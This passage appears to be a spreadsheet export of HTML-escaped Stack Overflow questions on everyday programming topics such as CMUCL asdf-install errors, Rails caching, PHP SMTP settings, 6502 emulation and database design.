For support see http://www.cons.org/cmucl/support.html Send bug reports to the debian BTS.
or to pvaneynd@debian.org
type (help) for help, (quit) to exit, and (demo) to see the demos
Loaded subsystems:
    Python 1.1, target Intel x86
    CLOS based on Gerd's PCL 2004/04/14 03:32:47
* (require :asdf-install)
Error in function REQUIRE:  Don't know how to load ASDF-INSTALL
   [Condition of type SIMPLE-ERROR]
Restarts:
  0: [ABORT] Return to Top-Level.
Debug  (type H for help)
(REQUIRE :ASDF-INSTALL NIL)
Source: 
; File: target:code/module.lisp
(ERROR "Don't know how to load ~A" MODULE-NAME)
0] (quit)
dsm@localhost:~$
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But sbcl works perfectly:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;dsm@localhost:~$ sbcl -q
This is SBCL 1.0.11.debian, an implementation of ANSI Common Lisp.
More information about SBCL is available at &amp;lt;http://www.sbcl.org/&amp;gt;.
SBCL is free software, provided as is, with absolutely no warranty.
It is mostly in the public domain; some portions are provided under
BSD-style licenses.  See the CREDITS and COPYING files in the
distribution for more information.
* (require :asdf-install)
; loading system definition from
; /usr/lib/sbcl/sb-bsd-sockets/sb-bsd-sockets.asd into #&amp;lt;PACKAGE "ASDF0"&amp;gt;
; registering #&amp;lt;SYSTEM SB-BSD-SOCKETS {AB01A89}&amp;gt; as SB-BSD-SOCKETS
; registering #&amp;lt;SYSTEM SB-BSD-SOCKETS-TESTS {AC67181}&amp;gt; as SB-BSD-SOCKETS-TESTS
("SB-BSD-SOCKETS" "ASDF-INSTALL")
* (quit)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any ideas on how to fix this? I found &lt;a href="https://bugs.launchpad.net/ubuntu/+source/common-lisp-controller/+bug/37208" rel="nofollow"&gt;this post&lt;/a&gt; on the internet, but using that didn't work either.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to simulate memory allocation errors</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My C application uses 3rd libraries, which do their own memory management.
In order to be robust, my application has code to deal with failures of library functions due to lack of free memory.&lt;/p&gt;
&lt;p&gt;I would like to test this code, and for this, I need to simulate failures due to lack of memory.&lt;/p&gt;
&lt;p&gt;What tool/s are recommended for this?
My environment is Linux/gcc.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a .NET OS abstraction layer to make OS calls work cross-platform?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I really want to write .NET apps that run on any platform (PC, Linux and Mac).  I am not really concerned about UI capabilities because these are mostly background services.  I have heard of MONO and that it allows you to write .NET apps that run on Mac and Linux, but I want to be able to write a single app that when compiled for Windows will run as a Service, and when compiled for Linux will run as whatever the UNIX equivalent is.  I also would like to be able to store things in the registry and have that work.  Is there any way to write truly OS agnostic code like this?  ...and DON'T say I should make it run on the web!  :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP GD, imagecreatefromstring( ); how to get the image dimensions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Normally I use &lt;code&gt;imagecreatefromjpeg()&lt;/code&gt; and then &lt;code&gt;getimagesize()&lt;/code&gt;, but with Firefox 3 I need to go round this different. So now im using &lt;code&gt;imagecreatefromstring()&lt;/code&gt;, but how do I retreive the image dimensions now?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best online book service for software development references?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm a member of ACM, and I have limited access to both Books 24x7 and Safari Books Online, however if I was interested in moving up to a full account for greater access to other books what online book service would you recommend?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In ASP.NET how you get the physcial file path when HttpContext.Current is NULL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working with DotNetNuke's scheduler to schedule tasks and I'm looking to get the physical file path of a email template that I created. The problem is that HttpContext is NULL because the scheduled task is on a different thread and there is not http request. How would you go about getting the file's physical path?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Caching paginated results, purging on update - how to solve?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've created a forum, and we're implementing an apc and memcache caching solution to save the database some work.&lt;/p&gt;
&lt;p&gt;I started implementing the cache layer with keys like "Categories::getAll", and if I had user-specific data, I'd append the keys with stuff like the user ID, so you'd get &lt;code&gt;"User::getFavoriteThreads|1471"&lt;/code&gt;. When a  user added a new favorite thread, I'd delete the cache key, and it would recreate the entry.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;However, and here comes the problem:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I wanted to cache the threads in a forum. Simple enough, "Forum::getThreads|$iForumId". But... With pagination, I'd have to split this into several cache entries, for example&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;"Forum::getThreads|$iForumId|$iLimit|$iOffset".
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which is alright, until someone posts a new thread in the forum. I will now have to delete all the keys under &lt;code&gt;"Forum::getThreads|$iForumId"&lt;/code&gt;, no matter what the limit and offset is.&lt;/p&gt;
&lt;p&gt;What would be a good way of solving this problem? I'd really rather not loop through every possible limit and offset until I find something that doesn't match anymore.&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Rails and Gmail SMTP, how to use a custom from address</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got my Rails (2.1) app setup to send email via Gmail, however whenever I send an email no matter what I set the from address to in my ActionMailer the emails always come as if sent from my Gmail email address. Is this a security restriction they've put in place at Gmail to stop spammers using their SMTP?&lt;/p&gt;
&lt;p&gt;Note: I've tried both of the following methods within my ActionMailer (just in case):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@from = me@mydomain.com
from 'me@mydomain.com'
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do I access cookies within Flash?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking to grab cookie values for the same domain within a Flash movie.  Is this possible?&lt;/p&gt;
&lt;p&gt;Let's see I let a user set a variable foo and I store it using any web programming language.  I can access it easily via that language, but I would like to access it via the Flash movie without passing it in via printing it within the HTML page.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the bigger hurdles to overcome migrating from Winforms to WPF?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been developing Winforms applications in C# for a few years now and have been interested in moving future development toward WPF, mainly because of the positive things I've been hearing about it.  But, I'm wondering what sort of hurdles others have had to overcome as they migrated to WPF.  Was there a significant hit to your productivity or any particular issues which you found challenging?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>likely()/unlikely() macros in the Linux kernel - how do they work? What's their benefit?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been digging through some parts of the Linux kernel, and found calls like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (unlikely(fd &amp;lt; 0))
{
    /* Do something */
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (likely(!err))
{
    /* Do something */
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've found the definition of them:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#define likely(x)       __builtin_expect((x),1)
#define unlikely(x)     __builtin_expect((x),0)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I know that they are for optimization, but how do they work? And how much performance/size decrease can be expected from using them? And is it worth the hassle (and losing the portability probably) at least in bottleneck code (in userspace, of course).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Use of the Exception class in c#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Errors that occur deep down in a data access layer or even higher up, (say within ADO.net operations for example) rarely make much sense to an end user. Simply bubbling these errors up to a UI and displaying them will usually achieve nothing except frustration for an end user.&lt;/p&gt;
&lt;p&gt;I have recently employed a basic technique for reporting errors such as this whereby I catch the error and at least add some user friendly text so that at least the end user understands what failed.&lt;/p&gt;
&lt;p&gt;To do this I am catching an exception within each specific function (say for example a fetch function in a data access layer), then raising a new error with user friendly text about the function that has failed and probably cause, but then embedding the original exception in the new exception as the "inner exception" of that new exception. &lt;/p&gt;
&lt;p&gt;This can then occur at each layer if necessary, each consumer of the lower level function adding it's own context to the error message, so that what reaches the UI is an increasingly user friendly error message.&lt;/p&gt;
&lt;p&gt;Once the error reaches the UI - if necessary - it can then iterate through the nested exceptions in order to display an error message that firstly tells the user which operation failed, but also provides a bit of technical information about what actually went wrong.&lt;/p&gt;
&lt;p&gt;e.g. &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;"The list of customer names your
  requested could not be displayed."&lt;/p&gt;
  &lt;p&gt;"Obtaining the list of customers
  you requested failed due to an error with the database."&lt;/p&gt;
  &lt;p&gt;"There was an error connecting to the
  database when retrieving a list of
  customers"&lt;/p&gt;
  &lt;p&gt;"Login failed for user xx"&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;My question is this: Is this horribly inefficient (all those nested exceptions)? I suspect it is not best practice so what should I be doing to achieve the same thing - or should I in fact be trying to achieve something better?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Database Choice for a C# 2008 front end</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was wondering what and why you would choose to be able to make a database that can support no more than 100 users with no more than 10 using it at once with a Visual Studio 2008 C# Windows Form front end to access it by. I have to access the database over a network connection, not just on the local machine. I also need to define where the database is found at run-time in the code as opposed to the "Data Source" view in Visual Studio. If my question needs reframing or is not understood, let me know and I will adjust. Part of my problem is I am not sure even how to ask the right question, much less what the answer is.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Not getting emails from ExceptionNotifier</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I followed this &lt;a href="http://svn.rubyonrails.org/rails/plugins/exception_notification/README" rel="nofollow"&gt;tutorial&lt;/a&gt; on configuring the Rails plugin ExceptionNotifier.&lt;/p&gt;
&lt;p&gt;I know that I have ActionMailer configured correctly because I am getting mail from other forms. I even have local_addresses.clear set so that it should be delivering mail no matter what.&lt;/p&gt;
&lt;p&gt;I am using Apache with a mongrel_cluster running in the backend.&lt;/p&gt;
&lt;p&gt;What am I missing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a Perl solution for lazy lists this side of Perl 6?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Has anybody found a good solution for lazily-evaluated lists in Perl? I've tried a number of ways to turn something like  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for my $item ( map { ... } @list ) { 
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;into a lazy evaluation--by tie-ing @list, for example. I'm trying to avoid breaking down and writing a source filter to do it, because they mess with your ability to debug the code. Has anybody had any success. Or do you just have to break down and use a while loop? &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; I guess that I should mention that I'm kind of hooked on sometimes long grep-map chains for functionally transforming lists. So it's not so much the foreach loop or the while loop. It's that map expressions tend to pack more functionality into the same vertical space. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Filtering duplicate newsgroup posts from Google</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the constant need to Google error messages to try to find out what they mean and what solutions people might have. Usually those error messages were posted in some newsgroup. Unfortunately, Google's results (even when it says "similar results removed") usually consist of many copies of the exact same message (usually with some non-answer) replicated among many different newsgroup archives. Even just Google Groups results will be there three or four times, counting different localizations of Google Groups. How do you sort through huge piles of the exact same newsgroup posts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How should I organize my ASP.Net themes and common CSS files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently working on a project where a programmer who fancied themselves a graphic designer attempted their hand at ASP.Net themes. The CSS is pretty bad, but that is another question altogether.&lt;/p&gt;
&lt;p&gt;What I really need help with is the best way to organize ASP.Net Themes and the CSS that lies within them. Imagine that there is a directory structure that looks something like this:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Themes
&lt;ul&gt;
&lt;li&gt;Theme A
&lt;ul&gt;
&lt;li&gt;StyleA.css&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Common.css&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;Theme B
&lt;ul&gt;
&lt;li&gt;StyleB.css&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Common.css&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;Theme C
&lt;ul&gt;
&lt;li&gt;StyleC.css&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Common.css&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each theme has a common stylesheet in it. Unfortunately the author of those style sheets managed to change only a few things here and there in each copy of &lt;em&gt;Common.css&lt;/em&gt;. Eventually I will evaluate whether or not those changes are even necessary, but some major cleanup needs to happen first. For now just assume that the changes, ever so small, are necessary for things to look right with each theme.&lt;/p&gt;
&lt;p&gt;I would like to know what the best practices are for using themes while also needing some common styles across your application. I want to minimize the number of AppTurns in the page load, but I really want to consolidate common styles into one place in a way that maintains the ease of themes.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>VisualStudio using BootCamp/VMWare on OS X</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Just bought a 2.4GHz Intel Core 2 Duo iMac with 2GB of memory and a 320GB hard drive. I plan on doing some .net development on it using a BootCamp/VMWare combo since VMWare grants access to the bootcamp partition.&lt;/p&gt;
&lt;p&gt;What is a recommended size for a BootCamp partition and how much memory should I give VMWare? Any pitfalls to watch out for? What is your current configuration?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How many unit tests should I write per function/method?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Do you write one test per function/method, with multiple checks in the test, or a test for each check?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>USRP2: Number of A/D Converters</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Why are there two A/D converters on the USRP2 board if you can only use one RX
daughtercard?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Report generation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am writing a web app using TurboGears, and in that app the users must be able to generate different reports.
The data the reports need is stored in a database (MySQL).
The reports must be returned either as a easily printable html document, or a pdf file.&lt;/p&gt;
&lt;p&gt;I have previously used jasper and iReport for creating the documents, but if I can avoid having to fire up Java to create the report I would be happy.&lt;/p&gt;
&lt;p&gt;Ideally I would like to specify reports in a easily readable markup language and then just feed the template data with some kind of library that produces the report.&lt;/p&gt;
&lt;p&gt;I gladly accept any kind of hints on how I should go about generating these reports!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Changing Hostname / IP Address of Windows System Mounted as an Image</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a way to change the hostname and IP address of a Windows XP system that is mounted via a loop-back image on a Linux system. So basically I have access to the Windows XP system on a file level, but I cannot execute any programs on it. A way similar to editing the /etc/hostname and whatever network configuration file under Linux.&lt;/p&gt;
&lt;p&gt;The only ways I've found so far would include running a tool after boot, e.g. MS sysprep or use a solution like Acronis Snap Deploy.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>interval rails caching</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to cache a single page. I've used ActionController's caches_page for this. But now, I'd like to expire AND regenerate it once in every 10 minutes. What are my options?&lt;/p&gt;
&lt;p&gt;later: I'd like to not use any external tools for this, like cron. The important point is &lt;strong&gt;interval-based&lt;/strong&gt; expiry of the cache. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Developing MS Word add-in</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Anyone knows of a good tool for developing add-ins for Word in .net?
Hopefully something that supports both office 2003 and 2007.&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How does nunit work?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can someone explain me how it works, starting from when you select to run a test&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are some ADFS alternatives for doing single sign on for an ASP.NET app with users in active directory?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Needs to be secure and able to handle thousands of users.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should domain objects and simple JavaBeans be unit tested?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Should simple JavaBeans that have only simple getters and setters be unit tested?? &lt;/p&gt;
&lt;p&gt;What about Beans with some logic in getters and setters?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to configure asp.net process to run under a domain account?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to configure asp.net process to run under an account with domain credentials.
My requirement is to access some files on a network share.&lt;/p&gt;
&lt;p&gt;What are the steps for this? Is there any built-in account I can use?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I detect, using php, if the machine has oracle (oci8 and/or pdo_oci) installed?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I detect, using php, if the machine has oracle &lt;code&gt;(oci8 and/or pdo_oci)&lt;/code&gt; installed?&lt;/p&gt;
&lt;p&gt;I'm working on a &lt;code&gt;PHP&lt;/code&gt; project where some developers, such as myself, have it installed, but there's little need for the themers to have it.  How can I write a quick function to use in the code so that my themers are able to work on the look of the site without having it crash on them?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.Net 8-bit Encoding</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on serial port, transmitting and receiving data to some hardware at 8bit data. I would like to store it as string to facilitate comparison, and preset data are stored as string or hex format in xml file. I found out that only when using Encoding.Default which is ANSI encoding then the 8bit data is converted properly and easily reversible. ASCII encoding will only works for 7bit data, and UTF8 or UTF7 doesn't works well too, since I'm using some character from 1-255. Encoding.Default would be just fine, but I read on MSDN that it's dependent on OS codepage setting, which means it might behave differently on different codepage configured. I use GetBytes() and GetString extensively using the Encoding, but would like a failsafe and portable method that works all the time at any configuration. Any idea or better suggestion for this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using the Window API, how do I ensure controls retain a native appearance?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Some of the controls I've created seem to default to the old Windows 95 theme, how do I prevent this? Here's an example of a button that does not retain the Operating System's native appearance (I'm using Vista as my development environment):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;HWND button = CreateWindowEx(NULL, L"BUTTON", L"OK", WS_VISIBLE | WS_CHILD | BS_PUSHBUTTON,
                                  170, 340, 80, 25, hwnd, NULL, GetModuleHandle(NULL), NULL);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm using native C++ with the Windows API, no managed code.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>6502 CPU Emulation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It's the weekend, so I relax from spending all week programming by writing a hobby project.&lt;/p&gt;
&lt;p&gt;I wrote the framework of a MOS 6502 CPU emulator yesterday, the registers, stack, memory and all the opcodes are implemented. (Link to source below)&lt;/p&gt;
&lt;p&gt;I can manually run a series of operations in the debugger I wrote, but I'd like to load a NES rom and just point the program counter at its instructions, I figured that this would be the fastest way to find flawed opcodes.&lt;/p&gt;
&lt;p&gt;I wrote a quick NES rom loader and loaded the ROM banks into the CPU memory.&lt;/p&gt;
&lt;p&gt;The problem is that I don't know how the opcodes are encoded. I know that the opcodes themselves follow a pattern of one byte per opcode that uniquely identifies the opcode, &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;0 - BRK
1 - ORA (D,X)
2 - COP b
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;etc&lt;/p&gt;
&lt;p&gt;However I'm not sure where I'm supposed to find the opcode argument. Is it the the byte directly following? In absolute memory, I suppose it might not be a byte but a short. &lt;/p&gt;
&lt;p&gt;Is anyone familiar with this CPU's memory model?&lt;/p&gt;
&lt;p&gt;EDIT: I realize that this is probably shot in the dark, but I was hoping there were some oldschool Apple and Commodore hackers lurking here.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; Thanks for your help everyone. After I implemented the proper changes to align each operation the CPU can load and run Mario Brothers. It doesn't do anything but loop waiting for Start, but its a good sign :)&lt;/p&gt;
&lt;p&gt;I uploaded the source:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.codeplex.com/Cpu6502/SourceControl/DirectoryView.aspx?SourcePath=&amp;amp;changeSetId=1810" rel="nofollow"&gt;http://www.codeplex.com/Cpu6502/SourceControl/DirectoryView.aspx?SourcePath=&amp;amp;changeSetId=1810&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;If anyone has ever wondered how an emulator works, its pretty easy to follow. Not optimized in the least, but then again, I'm emulating a CPU that runs at 2mhz on a 2.4ghz machine :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>source control with VB2005 Express</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anyone suggest a good source control system that interfaces with VB2005 Express? As the Express editions of Visual Studio do not allow add-ins does this mean that I will not be able to integrate source control into the IDE? I'm used to the check-in/check-out process of SourceSafe integrated into VB6. Can anyone recommend TortoiseSVN as an alternative?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to enable inno-db support on MySql 5 installed above MySql 4?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How to enable inno-db support on installed instance of MySql?&lt;/p&gt;
&lt;p&gt;I have installed mysql-5.0.67-win32.
'InnoDB' is 'DISABLED' when executing 'show engines'.
According to documentation MySql is compiled with support of inno-db
(From doc: A value of DISABLED occurs either because the server was started with an option that disables the engine, or because not all options required to enable it were given.)&lt;/p&gt;
&lt;p&gt;In my.ini I commented line with 'skip-innodb'. This didn't help.
All other inno-db related variables remain unchanged.&lt;/p&gt;
&lt;p&gt;I have performed some unusual action before I experienced described situation.
I have mysql-4.0.17-win installed. I uninstall it and after this installed mysql-5.0.67-win32.
In installation wizard I chose MyISAM support only (as far as I understand I disabled inno-db support in such way. When I tried to reinstall with support of inno-db I had problems of using my previous database 'mysql' with account information).&lt;/p&gt;
&lt;p&gt;MySQL documentation says that I should use mysqldump to export data and after this to import exported data in process of upgrade. I tried to do so, but when importing data I obtained message about syntax error (I think that it is connected with some incompatibilities of 4-th and 5-th version of mysql)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>php.ini &amp; SMTP= - how do you pass username &amp; password</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;code&gt;My ISP&lt;/code&gt; account requires that I send a username &amp;amp; password for outbound &lt;code&gt;SMTP&lt;/code&gt; mail. &lt;/p&gt;
&lt;p&gt;How do I get &lt;code&gt;PHP&lt;/code&gt; to use this when executing &lt;code&gt;php.mail()?&lt;/code&gt; The &lt;code&gt;php.ini&lt;/code&gt; file only contains entries for the server &lt;code&gt;(SMTP= )&lt;/code&gt; and &lt;code&gt;From: (sendmail_from= )&lt;/code&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is static metaprogramming possible in Java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am a fan of &lt;a href="http://stackoverflow.com/questions/112277/best-intro-to-c-static-metaprogramming"&gt;static metaprogramming in C++&lt;/a&gt;.  I know Java now has generics.  Does this mean that static metaprogramming (i.e., compile-time program execution) is possible in Java?  If so, can anyone recommend any good resources where one can learn more about it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Javascript error</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm getting a JS error on displaying a page: Nothing concrete is specified but the line where it seems to be thrown. When looking into the source code of the page, I see the error is thrown inside the following script, but I can't understand why! It's only about loading images!&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    &amp;lt;SCRIPT language=JavaScript&amp;gt;
&amp;lt;!--
function newImage(arg) {
    var	rslt = new Image();
    rslt.src = arg;
    return rslt;
}
function changeImages(a, b) {
    a.src =	b;
}
newImage("\/_layouts\/images\/icon1.gif");
newImage("\/_layouts\/images\/icon2.gif");
// --&amp;gt;
&amp;lt;/SCRIPT&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The error I am getting is when clicking on a drop down context menu on a page, for this line:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;newImage("\/_layouts\/images\/icon1.gif");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Error: The object doesn't accept this property or method
Code: 0&lt;/p&gt;
&lt;p&gt;I really don't see what could happen... Any tips on what may be happening here?&lt;br&gt;
Thanks a lot!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to have one appBase served by multiple context paths in Tomcat?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to have one appBase served up by multiple context paths in Tomcat?&lt;/p&gt;
&lt;p&gt;I have an application base that recently replaced a second application base.  My problem is a number of users still access the old context.  I would like to serve the, now common, application from a single appBase yet accessed via either context.  I took a swing at the low lying fruit and used a symbolic link in the 'webapps' directory... pointing the old context path at the new context path; it works, but feels "cheezy."  And I don't like that a database connection pool is created for both contexts ( I would like to minimize the resources for connecting to the database ).  &lt;/p&gt;
&lt;p&gt;Anyway, if anyone knows of the "proper" way to do this I will greatly appreciate it.  I'm using Tomcat 6.0.16 - no apache front end ( I suppose URL rewrite would be nice ).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I join two tables in a third n..n (hasAndBelongsToMany) relationship in CakePHP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a &lt;code&gt;n...n&lt;/code&gt; structure for two tables, &lt;strong&gt;&lt;code&gt;makes&lt;/code&gt;&lt;/strong&gt; and &lt;strong&gt;&lt;code&gt;models&lt;/code&gt;&lt;/strong&gt;. So far no problem.&lt;/p&gt;
&lt;p&gt;In a third table (&lt;strong&gt;&lt;code&gt;products&lt;/code&gt;&lt;/strong&gt;) like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;id
make_id
model_id
...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My problem is creating a view for products of one specifi &lt;strong&gt;&lt;code&gt;make&lt;/code&gt;&lt;/strong&gt; inside my &lt;code&gt;ProductsController&lt;/code&gt; containing just that's make models:&lt;/p&gt;
&lt;p&gt;I thought this could work:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var $uses = array('Make', 'Model');
$this-&amp;gt;Make-&amp;gt;id = 5; // My Make
$this-&amp;gt;Make-&amp;gt;find(); // Returns only the make I want with it's Models (HABTM)
$this-&amp;gt;Model-&amp;gt;find('list'); // Returns ALL models
$this-&amp;gt;Make-&amp;gt;Model-&amp;gt;find('list'); // Returns ALL models
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So, If I want to use the &lt;code&gt;list&lt;/code&gt; to pass to my view to create radio buttons I will have to do a &lt;code&gt;foreach()&lt;/code&gt; in my &lt;strong&gt;&lt;code&gt;make&lt;/code&gt;&lt;/strong&gt; array to find all models titles and create a new array and send to the view via &lt;code&gt;$this-&amp;gt;set()&lt;/code&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$makeArray = $this-&amp;gt;Make-&amp;gt;find();
foreach ($makeArray['Model'] as $model) {
    $modelList[] = $model['title'];
}
$this-&amp;gt;set('models', $models)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there any easier way to get that list without stressing the &lt;strong&gt;&lt;code&gt;make&lt;/code&gt;&lt;/strong&gt; Array. It will be a commom task to develops such scenarios in my application(s).&lt;/p&gt;
&lt;p&gt;Thanks in advance for any hint!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you re-attach a subversion local copy to a different remote?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Our subversion repository has been moved to a new host, and we have old applications that connect to that host.  We CANNOT add an alias for the new server with the old name, how can we re-connect our checked out clients to the new repository?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Conflicting desires in Database Design, with fields of two similar functions</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Okay, so I'm making a table right now for "Box Items".&lt;/p&gt;
&lt;p&gt;Now, a Box Item, depending on what it's being used for/the status of the item, may end up being related to a "Shipping" box or a "Returns" box.&lt;/p&gt;
&lt;p&gt;A Box Item may be defective:if it is, a flag will be set in the Box Item's row (IsDefective), and the Box Item will be put in a "Returns" box (with other items to be returned to that vendor).  Otherwise, the Box Item will eventually be put into a "Shipping" box (with other items to be shipped).  (Note that Shipping and Returns boxes have their own tables: there's not one common table for all boxes... though maybe I should consider doing that if possible as a third possibility?)&lt;/p&gt;
&lt;p&gt;Maybe I'm just not thinking clearly today, but I started questioning what should be done in this situation.&lt;/p&gt;
&lt;p&gt;My gut tells me that I should have a separate field for each possible relation, even if only one of the relations can happen at any given time, which would make the schema for Box Items look like:&lt;/p&gt;
&lt;p&gt;BoxItemID
Description
IsDefective
ShippingBoxID
ReturnBoxID
etc...&lt;/p&gt;
&lt;p&gt;This would make the relations clear, but it seems wasteful (since only one of the relations will be used at any time).  So then I thought I could have just one field for the BoxID, and determine which BoxID it's referring to (a Shipping or a Returns Box ID) based on the IsDefective field:&lt;/p&gt;
&lt;p&gt;BoxItemID
Description
IsDefective
BoxID
etc...&lt;/p&gt;
&lt;p&gt;This seems less wasteful, but doesn't sit right with me.  The relation isn't obvious.&lt;/p&gt;
